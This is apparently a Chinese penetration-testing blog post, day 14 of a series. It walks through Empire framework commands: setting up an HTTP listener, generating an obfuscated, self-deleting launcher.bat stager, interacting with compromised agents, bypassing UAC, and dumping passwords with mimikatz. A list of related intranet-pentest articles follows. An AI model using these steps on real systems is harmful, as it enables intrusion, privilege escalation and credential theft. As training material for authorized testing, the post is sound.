內網滲透 day14-empire基礎命令的使用
empire的基礎操作
目錄
1. 建立監聽器
2. 設定stagers
3. 使用者互動
4. 提權
1. 建立監聽器
help 檢視幫助命令
listeners 檢視監聽器
uselistener xxx 使用監聽器模組
常用的監聽模組:http
按兩次tab鍵檢視能使用的監聽器模組
info 檢視引數資訊
設定引數
set Name xxx
set Host http://xxx
set Port xxx
執行:execute
main 返回主選單
這邊顯示目前有一個活躍的監聽器
2. 設定stagers
usestagers xxx 使用stager模組
常用的模組:windows/hta、windows/launcher_bat
按兩次tab鍵檢視能使用的stager模組
info 檢視要設定的引數
set Listener xx 設定監聽器
set OutFile /var/www/html/launcher.bat 設定檔案生成路勁
delete 木馬執行完是否自動刪除
Obfuscate(混淆)
execute 執行
在靶機上雙擊bat檔案成功反彈會話
3. 使用者互動
agents 切換到使用者列表
list 列出使用者
rename 修改使用者ID的名字
interact 進入到使用者互動介面
sysinfo 檢視系統資訊
sc 截圖
searchmodule 搜尋模組
shell + command 執行命令
spawn 遷移到新的使用者需要指定監聽器的名字
產生了一個新的會話
使用者清除:
kill agents | all
監聽器清除:
kill listener | all
4. 提權
bypassuac <listener> bypassuac繞過uac提權
可以看到產生了一個帶*的會話,提權成功使用者名稱前面會多一個*號
mimikatz 在擁有許可權後可以利用mimikatz獲取使用者賬號密碼
creds 以列表的形式顯示mimikatz獲取的賬號密碼
uac提權(需要手動確認)
searchmodule ask 搜尋ask模組
usemodule privesc/ask 使用privesc/ask模組
info 檢視所需引數
設定監聽器
run 執行
靶機彈出uac認證框
列表中產生新的管理員會話
相關推薦
內網滲透 day14-empire基礎命令的使用
empire的基礎操作目錄1. 建立監聽器 2. 設定stagers 3. 使用者互動 4. 提權 1. 建立監聽器help 檢視幫助命令 listeners 檢視監聽器 uselistener xxx
內網滲透一些命令收集整理
分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!  
內網滲透基礎:內網、域、工作組、域控概念介紹
一、什麼是內網 區域網(Local Area Network, LAN),又稱內網,是指在某一區域內由多臺計算機互聯成的計算機組。 區域網可以實現檔案管理、應用軟體共享、印表機共享、掃描器共享、工作組內的日程安排、電子郵件和傳真通訊服務等功能。區域網嚴格意
Ettercap內網滲透
con true post har target htm 查看連接 tlist host 最近網速很卡,於是想到有人在蹭網,怎麽捉弄一下呢? 1、開啟ettercap ettercap -G 2、 Hosts->Scan,List 發現有幾個新的地址192.16
內網滲透常見隧道技術(原)
內網滲透中隧道滲透技術(原) 埠轉發、埠對映、socks代理工具(msf的portfwd、socks4a和windows下的lcx.exe)的使用做一個記錄筆記 場景應用 埠轉發:用於目標機器對某埠進出進行了限制 埠對映:用於目標機器內網環境無法外網進行3389連線
史上最強內網滲透知識點總結
獲取 webshell 進內網 測試主站,搜 wooyun 歷史洞未發現歷史洞,github, svn, 目錄掃描未發現敏感資訊, 無域傳送,埠只開了80埠,找到後臺地址,想爆破後臺,驗證碼後臺驗證,一次性,用 ocr 識別,找賬號,通過 google
內網滲透之reGeorg+Proxifier
0x00 前言 遇到內網環境,防火牆DMZ區域對映外網埠80,使用常規lcx等反彈工具也會被各種安全軟體攔截,嘗試各自提權無果,這個時候就需要一款內網代理和埠轉發工具,穿越防火牆的阻擋直連內網。 0x01 正向代理和反向代理 簡單區分一下正向代理和反向代理
內網滲透 關於GPO
網上有很多講內網滲透的文章,但看來看去還是一老外的部落格給力,部落格地址:www.harmj0y.net/blog,看完就明白這裡面的很多思路都非常好。 做內網時,有時會碰到目標的機器開防火牆,所有埠基本都訪問不到,這種就比較難辦了。就自己知道的方法只能靠GPO了(Group Policy Objec
內網滲透測試的藝術[一]資訊收集(入門篇)
資訊收集[入門篇] 利用系統現有工具在現有許可權條件下,我們到底能做些什麼務必要時刻謹記我們蒐集資訊的初衷(嚴謹盲目),我們所蒐集到的每個資訊,都應該有它存在的價值,也就是說後續我們到底可以拿它幹什麼?這無比重要,舉個簡單例子,就拿蒐集密碼來說,首先我要知道哪些
內網滲透bypassuac和smb溢位
對內網滲透需要滲透的目標主機處於跨網段和uac限制的情況做一個滲透記錄 環境大致如下 擁有shell許可權的win7(有uac限制,處於雙網段) 和同win7同一網段下暫時無許可權的靶機xp 先對有許可權的win7進行hashdump
內網滲透實戰(一)
本次測試為實戰,測試環境為朋友的個人商業網站,伺服器位於某資料中心,所提漏洞已通知並協助修復 首先借助該網站某處上傳漏洞,實現一句話木馬上傳,然後使用菜刀連線。
一次小小的內網滲透實戰(無後滲透階段)
時隔這麼久,讀書也讀了,考試也考完了。開始接受別人給我一次實戰的任務。--記一次學習不久的實戰,以後看到可能會笑自己輕噴有問題可以留言給我。謝謝這次選在了離我家比較近的網咖。每次上網完回家身上都是一股煙味,點比較煩。所以才會想來這裡。讓我們開始吧1、滲透環境配置需要材料有:
內網滲透思路整理與工具使用
前言上個學期一直在學審計,前幾天ST2漏洞大火,隨便打一個就是root許可權,我卻拿著root許可權不知如何繼續進行。因為這個,發現了自己對滲透知識的缺失,因此用了兩週左右的時間學習補充了一下內網滲透的知識,看了不少大牛的文章,膜拜之餘還是做了一些筆記的。到滲透入門結束之餘,
(二)內網滲透之tomcat中介軟體漏洞
使用埠掃描、漏洞掃描驗證掃描目標開放的埠,在對應埠上開放的服務,執行該服務的軟體和版本號。 如果只是使用埠掃描,只是發現開放的埠,接著使用 nc 、nmap可以獲取埠上服務的 banner 資訊,獲取 banner 資訊後需要在漏洞庫上查詢對應 CVE,後面就是驗證漏洞是否存在。如果是使用漏洞掃描工
(一)內網滲透之資訊收集
內網滲透之資訊收集篇-----參考先知白河愁作品,進行新增修改,轉載請註明出處。 一 主機掃描 (1)使用埠掃描工具可以實現主機發現的功能。以下引數可加快掃描程序。特意提的事nmap如何加快掃描進度。 –min-hostgroup 1024(調整並行掃描組的大小,最小分組設定為10
[原創]K8飛刀20150725 支援SOCKS5代理(內網滲透)
工具: K8飛刀編譯: 自己查殼組織: K8搞基大隊[K8team]作者: K8拉登哥哥部落格: http://qqhack8.blog.163.com釋出: 2015/7/26 3:41:11簡介: K8飛刀是一款多功能的滲透測試工具. Hacke
從零開始內網滲透學習
檸檬的內網合集,第二次看,感覺就不一樣了。。。 雖然我們同屆,但感覺相差甚遠啊,努力努力。 Team:Syclover Author:L3m0n Email:[email protected] [TOC] ###域環境搭建 準備: DC: win2008
內網滲透之如何玩轉Meterpreter?
隨著windows系統的不斷更新完善,windows對使用者系統的安全力度也在加強。這對我們的滲透,也帶來了不少的麻煩。今天我將帶大家,利用目前流行的 metasploit 框架,繞過一些 UAC 及防火牆的限制,從而達到成功利用的目的! 由於繞過 UAC 的功能需在
n2n內網穿透神器(一條命令實現穿透)(linux,安卓,win,openwrt全介紹)
n2n簡介: 百度百科:N2N,內衣服飾品牌於上世紀九十年代在美國誕生,經歷逾二十幾年的不斷拓展,現發展成為龐大的跨國內衣服飾品牌,其連鎖專賣店網路遍佈全球100多個國家大、中城市,數目逾萬間,無論品
內網滲透—流量轉發
#### 0x00前言 在拿到一臺伺服器的shell的時候,如果想要更進一步滲透測試,則需要進行內網滲透 而內網滲透的第一步就是掛代理,首先需要明確一個概念,在日常生活中常用`vpn`掛代理去google查資料,自己搭過`vpn`的人都知道,要在買的`vps`上搭建`ss的伺服器端`,之後在`自己電腦`上